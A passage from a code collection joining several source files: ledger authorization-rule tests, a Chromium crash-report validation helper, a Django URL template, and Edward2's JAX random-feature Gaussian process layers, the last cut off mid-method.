Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: s1},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: 3},
is_owner=owner, amount=2, extra_sigs=True)
for owner in [True, False]],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: 3, ENDORSER: s1},
is_owner=owner, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={TRUSTEE: 3, IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=owner, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=IDENTITY_OWNER, endorser=None, sigs={},
is_owner=owner, amount=2, extra_sigs=False)
for owner in [True, False]] + [
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=owner, amount=2, extra_sigs=False)
for owner in [True, False]
for s in range(1, MAX_SIG_COUNT + 1)],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=owner, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=TRUSTEE, endorser=None, sigs=signature,
is_owner=owner, amount=2, extra_sigs=True)
for signature in signatures
for owner in [True, False]],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=TRUSTEE, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=owner, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_not_allowed(write_auth_req_validator, write_request_validation,
author, endorser, signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraintForbidden(),
valid_actions=[],
author=author, endorser=endorser,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
|
chrome/test/kasko/py/kasko/report.py | google-ar/chromium | 777 | 12748304 | <reponame>google-ar/chromium
#!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility functions for dealing with crash reports."""
import logging
import os
_LOGGER = logging.getLogger(os.path.basename(__file__))
def LogCrashKeys(report):
for key in sorted(report.keys()):
val = report[key][0]
    if len(val) < 64:
_LOGGER.debug('Got crashkey "%s": "%s"', key, val)
else:
_LOGGER.debug('Got crashkey "%s": ...%d bytes...', key, len(val))
def ValidateCrashReport(report, expectations=None):
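  # Raises if any crash key expected from the Chrome/Kasko integration (or from
  # the optional expectations argument) is missing from the report.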
expected_keys = {}
# The following keys are all expected to be set in all crashes, and should
# be set by GetCrashKeysForKasko. The 'channel' crash-key doesn't need to be
# set as it is omitted when empty (developer builds).
get_crash_keys = 'GetCrashKeysForKasko'
for k in ['guid', 'prod', 'plat', 'ver', 'ptype']:
expected_keys[k] = get_crash_keys
# The following crash keys are expected to be set by the Kasko code itself.
kasko = 'Kasko'
for k in ['kasko-generated-by-version', 'kasko-uploaded-by-version']:
expected_keys[k] = kasko
# Merge in additional expectations.
if expectations:
for key, value in expectations.iteritems():
expected_keys[key] = value
# Validate the expectations.
missing_keys = False
for expected_key, error in expected_keys.iteritems():
if expected_key not in report:
_LOGGER.error('Missing expected "%s" crash key.', expected_key)
_LOGGER.error('"%s" integration appears broken.', error)
missing_keys = True
if missing_keys:
raise Exception('Missing expected crash keys.')
|
lib/django-0.96/django/conf/project_template/urls.py | MiCHiLU/google_appengine_sdk | 790 | 12748335 | <filename>lib/django-0.96/django/conf/project_template/urls.py
from django.conf.urls.defaults import *
urlpatterns = patterns('',
# Example:
# (r'^{{ project_name }}/', include('{{ project_name }}.foo.urls')),
# Uncomment this for admin:
# (r'^admin/', include('django.contrib.admin.urls')),
)
|
edward2/jax/nn/random_feature.py | google/edward2 | 591 | 12748339 | # coding=utf-8
# Copyright 2021 The Edward2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definitions for random feature Gaussian process layer.
## References:
[1]: Liu et al. Simple and principled uncertainty estimation with deterministic
deep learning via distance awareness. In _Neural Information Processing
Systems_, 2020.
https://arxiv.org/abs/2006.10108
[2]: Xu et al. Understanding and Improving Layer Normalization. In _Neural
Information Processing Systems_, 2019.
https://papers.nips.cc/paper/2019/file/2f4fe03d77724a7217006e5d16728874-Paper.pdf
[3]: <NAME> and <NAME>. Random Features for Large-Scale Kernel
Machines. In _Neural Information Processing Systems_, 2007.
https://people.eecs.berkeley.edu/~brecht/papers/07.rah.rec.nips.pdf
[4]: <NAME>, <NAME>, <NAME>. Uncertainty Estimation with Infinitesimal
Jackknife. _arXiv preprint arXiv:2006.07584_, 2020.
https://arxiv.org/abs/2006.07584
"""
import dataclasses
import functools
from typing import Any, Callable, Iterable, Mapping, Optional, Tuple, Union
import flax.linen as nn
import jax
from jax import lax
from jax import random
import jax.numpy as jnp
# Jax-related data types.
PRNGKey = Any
Shape = Iterable[int]
Dtype = type(jnp.float32)
Array = jnp.ndarray
Initializer = Callable[[PRNGKey, Shape, Dtype], Array]
# Default config for random features.
default_rbf_activation = jnp.cos
default_rbf_bias_init = nn.initializers.uniform(scale=2. * jnp.pi)
# Using "he_normal" style random feature distribution. Effectively, this is
# equivalent to approximating a RBF kernel but with the input standardized by
# its dimensionality (i.e., input_scaled = input * sqrt(2. / dim_input)) and
# empirically leads to better performance for neural network inputs.
default_rbf_kernel_init = nn.initializers.variance_scaling(
scale=2.0, mode='fan_in', distribution='normal')
# Default field value for kwargs, to be used for data class declaration.
default_kwarg_dict = lambda: dataclasses.field(default_factory=dict)
SUPPORTED_LIKELIHOOD = ('binary_logistic', 'poisson', 'gaussian')
MIN_SCALE_MONTE_CARLO = 1e-3
class RandomFeatureGaussianProcess(nn.Module):
"""A Gaussian process layer using random Fourier features [1].
Attributes:
features: the number of output units.
hidden_features: the number of hidden random fourier features.
normalize_input: whether to normalize the input using nn.LayerNorm.
norm_kwargs: Optional keyword arguments to the input nn.LayerNorm layer.
hidden_kwargs: Optional keyword arguments to the random feature layer.
output_kwargs: Optional keyword arguments to the predictive logit layer.
covmat_kwargs: Optional keyword arguments to the predictive covmat layer.
"""
features: int
hidden_features: int = 1024
normalize_input: bool = True
# Optional keyword arguments.
norm_kwargs: Mapping[str, Any] = default_kwarg_dict()
hidden_kwargs: Mapping[str, Any] = default_kwarg_dict()
output_kwargs: Mapping[str, Any] = default_kwarg_dict()
covmat_kwargs: Mapping[str, Any] = default_kwarg_dict()
def setup(self):
"""Defines model layers."""
# pylint:disable=invalid-name,not-a-mapping
if self.normalize_input:
# Prefer a parameter-free version of LayerNorm by default [2]. Can be
# overwritten by passing norm_kwargs=dict(use_bias=..., use_scales=...).
LayerNorm = functools.partial(
nn.LayerNorm, use_bias=False, use_scale=False)
self.norm_layer = LayerNorm(**self.norm_kwargs)
self.hidden_layer = RandomFourierFeatures(
features=self.hidden_features, **self.hidden_kwargs)
self.output_layer = nn.Dense(features=self.features, **self.output_kwargs)
self.covmat_layer = LaplaceRandomFeatureCovariance(
hidden_features=self.hidden_features, **self.covmat_kwargs)
# pylint:enable=invalid-name,not-a-mapping
def __call__(self,
inputs: Array,
return_full_covmat: bool = False,
return_random_features: bool = False) -> Array:
"""Computes Gaussian process outputs.
Args:
inputs: the nd-array of shape (batch_size, ..., input_dim).
return_full_covmat: whether to return the full covariance matrix, shape
(batch_size, batch_size), or only return the predictive variances with
shape (batch_size, ).
return_random_features: whether to return the random fourier features for
the inputs.
Returns:
A tuple of predictive logits, predictive covmat and (optionally)
random Fourier features.
"""
gp_inputs = self.norm_layer(inputs) if self.normalize_input else inputs
gp_features = self.hidden_layer(gp_inputs)
gp_logits = self.output_layer(gp_features)
gp_covmat = self.covmat_layer(
gp_features, gp_logits, diagonal_only=not return_full_covmat)
# Returns predictive logits, covmat and (optionally) random features.
if return_random_features:
return gp_logits, gp_covmat, gp_features
return gp_logits, gp_covmat
class RandomFourierFeatures(nn.Module):
"""A random fourier feature (RFF) layer that approximates a kernel model.
The random feature transformation is a one-hidden-layer network with
non-trainable weights (see, e.g., Algorithm 1 of [3]). Specifically:
f(x) = activation(x @ kernel + bias) * output_scale.
The forward pass logic closely follows that of the nn.Dense.
Attributes:
features: the number of output units.
    feature_scale: scale to apply to the output (default: 1.; if set to None,
      sqrt(2. / features) is used instead, see Algorithm 1 of [3]).
activation: activation function to apply to the output.
kernel_init: initializer function for the weight matrix.
bias_init: initializer function for the bias.
seed: random seed for generating random features (default: 0). This will
override the external RNGs.
dtype: the dtype of the computation (default: float32).
"""
features: int
feature_scale: Optional[jnp.float32] = 1.
activation: Callable[[Array], Array] = default_rbf_activation
kernel_init: Initializer = default_rbf_kernel_init
bias_init: Initializer = default_rbf_bias_init
seed: int = 0
dtype: Dtype = jnp.float32
collection_name: str = 'random_features'
def setup(self):
# Defines the random number generator.
self.rng = random.PRNGKey(self.seed)
# Processes random feature scale.
self._feature_scale = self.feature_scale
if self._feature_scale is None:
self._feature_scale = jnp.sqrt(2. / self.features)
self._feature_scale = jnp.asarray(self._feature_scale, dtype=self.dtype)
@nn.compact
def __call__(self, inputs: Array) -> Array:
"""Applies random feature transformation along the last dimension of inputs.
Args:
inputs: The nd-array to be transformed.
Returns:
The transformed input.
"""
# Initializes variables.
input_dim = inputs.shape[-1]
kernel_rng, bias_rng = random.split(self.rng, num=2)
kernel_shape = (input_dim, self.features)
kernel = self.variable(self.collection_name, 'kernel', self.kernel_init,
kernel_rng, kernel_shape, self.dtype)
bias = self.variable(self.collection_name, 'bias', self.bias_init,
bias_rng, (self.features,), self.dtype)
# Specifies multiplication dimension.
contracting_dims = ((inputs.ndim - 1,), (0,))
batch_dims = ((), ())
# Performs forward pass.
inputs = jnp.asarray(inputs, self.dtype)
outputs = lax.dot_general(inputs, kernel.value,
(contracting_dims, batch_dims))
outputs = outputs + jnp.broadcast_to(bias.value, outputs.shape)
return self._feature_scale * self.activation(outputs)
class LaplaceRandomFeatureCovariance(nn.Module):
"""Computes the Gaussian Process covariance using Laplace method.
Attributes:
hidden_features: the number of random fourier features.
ridge_penalty: Initial Ridge penalty to weight covariance matrix. This value
is used to stablize the eigenvalues of weight covariance estimate so that
the matrix inverse can be computed for Cov = inv(t(X) @ X + s * I). The
ridge factor s cannot be too large since otherwise it will dominate the
t(X) * X term and make covariance estimate not meaningful.
momentum: A discount factor used to compute the moving average for posterior
precision matrix. Analogous to the momentum factor in batch normalization.
If `None` then update covariance matrix using a naive sum without
momentum, which is desirable if the goal is to compute the exact
covariance matrix by passing through data once (say in the final epoch).
In this case, make sure to reset the precision matrix variable between
epochs by replacing it with self.initial_precision_matrix().
likelihood: The likelihood to use for computing Laplace approximation for
the covariance matrix. Can be one of ('binary_logistic', 'poisson',
'gaussian').
"""
hidden_features: int
ridge_penalty: float = 1.
momentum: Optional[float] = None
likelihood: str = 'gaussian'
collection_name: str = 'laplace_covariance'
dtype: Dtype = jnp.float32
def setup(self):
if self.momentum is not None:
if self.momentum < 0. or self.momentum > 1.:
raise ValueError(f'`momentum` must be between (0, 1). '
f'Got {self.momentum}.')
if self.likelihood not in SUPPORTED_LIKELIHOOD:
raise ValueError(f'"likelihood" must be one of {SUPPORTED_LIKELIHOOD}, '
f'got {self.likelihood}.')
@nn.compact
def __call__(self,
gp_features: Array,
gp_logits: Optional[Array] = None,
diagonal_only: bool = True) -> Optional[Array]:
"""Updates the precision matrix and computes the predictive covariance.
NOTE:
The precision matrix will be updated only during training (i.e., when
`self.collection_name` are in the list of mutable variables). The covariance
matrix will be computed only during inference to avoid repeated calls to the
(expensive) `linalg.inv` op.
Args:
gp_features: The nd-array of random fourier features, shape (batch_size,
..., hidden_features).
gp_logits: The nd-array of predictive logits, shape (batch_size, ...,
logit_dim). Cannot be None if self.likelihood is not `gaussian`.
diagonal_only: Whether to return only the diagonal elements of the
predictive covariance matrix (i.e., the predictive variance).
Returns:
The predictive variances of shape (batch_size, ) if diagonal_only=True,
otherwise the predictive covariance matrix of shape
(batch_size, batch_size).
"""
gp_features = jnp.asarray(gp_features, self.dtype)
# Flatten GP features and logits to 2-d, by doing so we treat all the
# non-final dimensions as the batch dimensions.
gp_features = jnp.reshape(gp_features, [-1, self.hidden_features])
if gp_logits is not None:
gp_logits = jnp.asarray(gp_logits, self.dtype)
gp_logits = jnp.reshape(gp_logits, [gp_features.shape[0], -1])
precision_matrix = self.variable(self.collection_name, 'precision_matrix',
lambda: self.initial_precision_matrix()) # pylint: disable=unnecessary-lambda
# Updates the precision matrix during training.
initializing = self.is_mutable_collection('params')
training = self.is_mutable_collection(self.collection_name)
if training and not initializing:
precision_matrix.value = self.update_precision_matrix(
gp_features, gp_logits, precision_matrix.value)
# Computes covariance matrix during inference.
if not training:
return self.compute_predictive_covariance(gp_features, precision_matrix,
diagonal_only)
def initial_precision_matrix(self):
"""Returns the initial diagonal precision matrix."""
return jnp.eye(self.hidden_features, dtype=self.dtype) * self.ridge_penalty
def update_precision_matrix(self, gp_features: Array,
gp_logits: Optional[Array],
precision_matrix: Array) -> Array:
"""Updates precision matrix given a new batch.
Args:
gp_features: random features from the new batch, shape (batch_size,
hidden_features)
gp_logits: predictive logits from the new batch, shape (batch_size,
logit_dim). Currently only logit_dim=1 is supported.
precision_matrix: the current precision matrix, shape (hidden_features,
hidden_features).
Returns:
Updated precision matrix, shape (hidden_features, hidden_features).
Raises:
(ValueError) If the logit is None or not univariate when likelihood is
not Gaussian.
"""
if self.likelihood != 'gaussian':
if gp_logits is None:
raise ValueError(
f'`gp_logits` cannot be None when likelihood=`{self.likelihood}`')
if gp_logits.ndim > 1 and gp_logits.shape[-1] != 1:
raise ValueError(
f'likelihood `{self.likelihood}` only support univariate logits. '
f'Got logits dimension: {gp_logits.shape[-1]}')
# Computes precision matrix within new batch.
if self.likelihood == 'binary_logistic':
prob = nn.sigmoid(gp_logits)
prob_multiplier = prob * (1. - prob)
elif self.likelihood == 'poisson':
prob_multiplier = jnp.exp(gp_logits)
else:
prob_multiplier = 1.
gp_features_adj = jnp.sqrt(prob_multiplier) * gp_features
batch_prec_mat = jnp.matmul(jnp.transpose(gp_features_adj), gp_features_adj)
# Updates precision matrix.
if self.momentum is None:
# Performs exact update without momentum.
precision_matrix_updated = precision_matrix + batch_prec_mat
else:
batch_size = gp_features.shape[0]
precision_matrix_updated = (
self.momentum * precision_matrix +
(1 - self.momentum) * batch_prec_mat / batch_size)
return precision_matrix_updated
def compute_predictive_covariance(self, gp_features: Array,
precision_matrix: nn.Variable,
diagonal_only: bool) -> Array:
"""Computes the predictive covariance.
Approximates the Gaussian process posterior using random features.
Given training random feature Phi_tr (num_train, num_hidden) and testing
random feature Phi_ts (batch_size, num_hidden). The predictive covariance
matrix is computed as (assuming Gaussian likelihood):
s * Phi_ts @ inv(t(Phi_tr) * Phi_tr + s * I) @ t(Phi_ts),
where s is the ridge factor to be used for stablizing the inverse, and I is
the identity matrix with shape (num_hidden, num_hidden).
Args:
gp_features: the random feature of testing data to be used for computing
the covariance matrix. Shape (batch_size, gp_hidden_size).
precision_matrix: the model's precision matrix.
diagonal_only: whether to return only the diagonal elements of the
predictive covariance matrix (i.e., the predictive variances).
Returns:
The predictive variances of shape (batch_size, ) if diagonal_only=True,
otherwise the predictive covariance matrix of shape
(batch_size, batch_size).
"""
precision_matrix_inv = jnp.linalg.inv(precision_matrix.value)
cov_feature_product = jnp.matmul(precision_matrix_inv,
jnp.transpose(gp_features))
if diagonal_only:
# Compute diagonal element only, shape (batch_size, ).
# Using the identity diag(A @ B) = col_sum(A * tr(B)).
gp_covar = jnp.sum(
gp_features * jnp.transpose(cov_feature_product), axis=-1)
else:
# Compute full covariance matrix, shape (batch_size, batch_size).
gp_covar = jnp.matmul(gp_features, cov_feature_product)
return self.ridge_penalty * gp_covar
class MCSigmoidDenseFASNGP(nn.Module):
"""Heteroscedastic SNGP for data with sigmoid output activation.
Output layer which combines the benefits of the heteroscedastic
(https://arxiv.org/abs/2105.10305) and SNGP (https://arxiv.org/abs/2006.10108)
methods. Assumes spectral normalization is applied to network producing
`inputs` to the __call__ method.
Attributes:
num_outputs: Number of outputs for classification task.
num_factors: Number of factors to use in approximation to full rank
covariance matrix.
temperature: The softmax temperature.
parameter_efficient: Whether to use the parameter efficient
version of the method. If True then samples from the latent distribution
are generated as: mu(x) + v(x) * matmul(V, eps_R) + diag(d(x), eps_K)),
where eps_R ~ N(0, I_R), eps_K ~ N(0, I_K). If False then latent samples
are generated as: mu(x) + matmul(V(x), eps_R) + diag(d(x), eps_K)).
Computing V(x) as function of x increases the number of parameters
introduced by the method.
train_mc_samples: The number of Monte-Carlo samples used to estimate the
predictive distribution during training.
test_mc_samples: The number of Monte-Carlo samples used to estimate the
predictive distribution during testing/inference.
share_samples_across_batch: If True, the latent noise samples
are shared across batch elements. If encountering XLA compilation errors
due to dynamic shape inference setting = True may solve.
logits_only: If True, only return the logits from the __call__ method.
return_locs: If True, return the location parameter of the Gaussian
latent variable in place of the `logits`.
eps: Clip probabilities into [eps, 1.0] before applying log.
het_var_weight: Weighting on the heteroscedastic variance when computing
samples from the Gaussian latent variable.
sngp_var_weight: Weighting on the GP variance when computing samples from
the Gaussian latent variable.
hidden_features: Number of features for Random Fourier Feature GP
approximation.
normalize_input: Whether to normalize the input for the GP layer.
norm_kwargs: Normalization keywords for the GP layer.
hidden_kwargs: Hidden layer keywords for the GP layer.
output_kwargs: Output keywords for the GP layer.
covmat_kwargs: Covariance matrix keywords for the GP layer.
"""
num_outputs: int
num_factors: int # set num_factors = 0 for diagonal method
temperature: float = 1.0
parameter_efficient: bool = False
train_mc_samples: int = 1000
test_mc_samples: int = 1000
share_samples_across_batch: bool = False
logits_only: bool = False
return_locs: bool = False
eps: float = 1e-7
het_var_weight: float = 1.0
sngp_var_weight: float = 0.0
hidden_features: int = 1024
normalize_input: bool = True
# Optional keyword arguments.
norm_kwargs: Mapping[str, Any] = default_kwarg_dict()
hidden_kwargs: Mapping[str, Any] = default_kwarg_dict()
output_kwargs: Mapping[str, Any] = default_kwarg_dict()
covmat_kwargs: Mapping[str, Any] = default_kwarg_dict()
def setup(self):
if self.parameter_efficient:
self._scale_layer_homoscedastic = nn.Dense(
self.num_outputs, name='scale_layer_homoscedastic')
self._scale_layer_heteroscedastic = nn.Dense(
self.num_outputs, name='scale_layer_heteroscedastic')
elif self.num_factors > 0:
self._scale_layer = nn.Dense(
self.num_outputs * self.num_factors, name='scale_layer')
self._loc_layer = RandomFeatureGaussianProcess(
features=self.num_outputs,
hidden_features=self.hidden_features,
normalize_input=self.normalize_input,
norm_kwargs=self.norm_kwargs,
hidden_kwargs=self.hidden_kwargs,
output_kwargs=self.output_kwargs,
covmat_kwargs=self.covmat_kwargs,
name='loc_layer')
self._diag_layer = nn.Dense(self.num_outputs, name='diag_layer')
def _compute_loc_param(self, inputs: Array) -> Array:
"""Computes location parameter of the "logits distribution".
Args:
inputs: The input to the heteroscedastic output layer.
Returns:
Array of shape [batch_size, num_classes].
"""
return self._loc_layer(inputs)
def _compute_scale_param(self, inputs: Array, covmat_sngp: Array,
training: int) -> Tuple[Array, Array]:
"""Computes scale parameter of the "logits distribution".
Args:
inputs: The input to the heteroscedastic output layer.
covmat_sngp: GP output layer covariance matrix.
training: in training mode or not.
Returns:
2-Tuple of Array of shape
([batch_size, num_classes * max(num_factors, 1)],
[batch_size, num_classes]).
"""
if self.parameter_efficient or self.num_factors <= 0:
low_rank = inputs
diag = jax.nn.softplus(self._diag_layer(inputs)) + MIN_SCALE_MONTE_CARLO
else:
low_rank = self._scale_layer(inputs)
diag = jax.nn.softplus(self._diag_layer(inputs)) + MIN_SCALE_MONTE_CARLO
initializing = self.is_mutable_collection('params')
if training or initializing:
diag_comp = diag
else:
# assume diagonal_only=True
sngp_marginal_vars = jnp.expand_dims(covmat_sngp, -1)
diag_comp = jnp.sqrt(self.het_var_weight * jnp.square(diag) +
self.sngp_var_weight * sngp_marginal_vars)
return low_rank, diag_comp
def _compute_diagonal_noise_samples(self, diag_scale: Array,
num_samples: int) -> Array:
"""Computes samples of the diagonal elements logit noise.
Args:
diag_scale: Array of shape [batch_size, num_classes]. Diagonal
elements of scale parameters of the distribution to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array. Logit noise samples of shape:
[batch_size, num_samples, num_outputs].
"""
if self.share_samples_across_batch:
samples_per_batch = 1
else:
samples_per_batch = diag_scale.shape[0]
key = self.make_rng('diag_noise_samples')
return jnp.expand_dims(diag_scale, 1) * jax.random.normal(
key, shape=(samples_per_batch, num_samples, 1))
def _compute_standard_normal_samples(self, factor_loadings: Array,
num_samples: int) -> Array:
"""Utility that computes samples from a standard normal distribution.
Args:
factor_loadings: Array of shape
[batch_size, num_classes * num_factors]. Factor loadings for scale
parameters of the distribution to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array. Samples of shape: [batch_size, num_samples, num_factors].
"""
if self.share_samples_across_batch:
samples_per_batch = 1
else:
samples_per_batch = factor_loadings.shape[0]
key = self.make_rng('standard_norm_noise_samples')
standard_normal_samples = jax.random.normal(
key, shape=(samples_per_batch, num_samples, self.num_factors))
if self.share_samples_across_batch:
standard_normal_samples = jnp.tile(standard_normal_samples,
[factor_loadings.shape[0], 1, 1])
return standard_normal_samples
def _compute_noise_samples(self, scale: Tuple[Array, Array],
num_samples: int) -> Array:
"""Utility function that computes additive noise samples.
Args:
scale: Tuple of Array of shape (
[batch_size, num_classes * num_factors],
[batch_size, num_classes]). Factor loadings and diagonal elements
for scale parameters of the distribution to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array. Logit noise samples of shape:
[batch_size, num_samples, num_outputs].
"""
factor_loadings, diag_scale = scale
# Compute the diagonal noise
diag_noise_samples = self._compute_diagonal_noise_samples(diag_scale,
num_samples)
if self.num_factors > 0:
# Now compute the factors
standard_normal_samples = self._compute_standard_normal_samples(
factor_loadings, num_samples)
if self.parameter_efficient:
res = self._scale_layer_homoscedastic(standard_normal_samples)
res *= jnp.expand_dims(
self._scale_layer_heteroscedastic(factor_loadings), 1)
else:
# reshape scale vector into factor loadings matrix
factor_loadings = jnp.reshape(factor_loadings,
[-1, self.num_outputs, self.num_factors])
# transform standard normal into ~ full rank covariance Gaussian samples
res = jnp.einsum('ijk,iak->iaj',
factor_loadings, standard_normal_samples)
return res + diag_noise_samples
return diag_noise_samples
def _compute_mc_samples(self, locs: Array, scale: Array,
num_samples: int) -> Array:
"""Utility function that computes Monte-Carlo samples (using sigmoid).
Args:
locs: Array of shape [batch_size, total_mc_samples, num_outputs].
Location parameters of the distributions to be sampled.
scale: Array of shape [batch_size, total_mc_samples, num_outputs].
Scale parameters of the distributions to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array of shape [batch_size, num_samples, num_outputs]. Average over the
MC samples.
"""
locs = jnp.expand_dims(locs, axis=1)
noise_samples = self._compute_noise_samples(scale, num_samples)
latents = locs + noise_samples
samples = jax.nn.sigmoid(latents / self.temperature)
return jnp.mean(samples, axis=1)
@nn.compact
def __call__(self, inputs: Array, training: int = True) -> Union[
Tuple[Array, Array], Tuple[Array, Array, Array, Array]]:
"""Computes predictive and log predictive distributions.
Uses Monte Carlo estimate of sigmoid approximation to HetSNGP model to
compute predictive distribution.
Args:
inputs: The input to the heteroscedastic output layer.
training: Whether we are training or not.
Returns:
Tuple of Array: (logits, covmat_sngp) if logits_only = True. Otherwise,
tuple of (logits, covmat_sngp, log_probs, probs). Logits
represents the argument to a sigmoid function that would yield probs
(logits = inverse_sigmoid(probs)), so logits can be used with the
sigmoid cross-entropy loss function.
"""
# return_random_features set to False, so guaranteed to return 2-tuple
locs, covmat_sngp = self._compute_loc_param(inputs) # pylint: disable=assignment-from-none,unbalanced-tuple-unpacking
# guaranteed to return 2-tuple due to scale_layer construction
